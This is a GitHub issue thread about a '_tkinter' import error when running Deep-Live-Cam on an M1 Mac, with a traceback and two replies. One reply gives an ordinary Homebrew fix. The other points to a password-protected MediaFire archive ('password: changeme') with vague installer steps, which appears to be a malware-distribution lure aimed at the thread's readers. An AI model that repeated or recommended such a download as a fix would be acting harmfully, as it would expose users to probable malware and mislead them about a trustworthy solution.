### ISSUE TITLE
ModuleNotFoundError: No module named '_tkinter'

### ISSUE THREAD

**Issue by sameerakhtari** [hacksider/Deep-Live-Cam#484]
when i am running this on my m1 macbook air, this error im getting at the last step where we run it. 
Even I installed tkinter module , reinstalled python, reinstalled requirement.txt but still same.

```
(venv39) apple@Apples-MacBook-Air Deep-Live-Cam % python run.py --execution-provider coreml

Traceback (most recent call last):
  File "/Users/apple/Downloads/testRepo/Deep-Live-Cam/run.py", line 3, in <module>
    from modules import core
  File "/Users/apple/Downloads/testRepo/Deep-Live-Cam/modules/core.py", line 20, in <module>
    import modules.ui as ui
  File "/Users/apple/Downloads/testRepo/Deep-Live-Cam/modules/ui.py", line 3, in <module>
    import customtkinter as ctk
  File "/Users/apple/Downloads/testRepo/Deep-Live-Cam/venv39/lib/python3.9/site-packages/customtkinter/__init__.py", line 5, in <module>
    from tkinter import Variable, StringVar, IntVar, DoubleVar, BooleanVar
  File "/opt/homebrew/Cellar/python@3.9/3.9.19_1/Frameworks/Python.framework/Versions/3.9/lib/python3.9/tkinter/__init__.py", line 37, in <module>
    import _tkinter # If this fails your Python may not be configured for Tk
ModuleNotFoundError: No module named '_tkinter'

```

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by brianmatzelle** [comment]
brew install python-tk@3.10
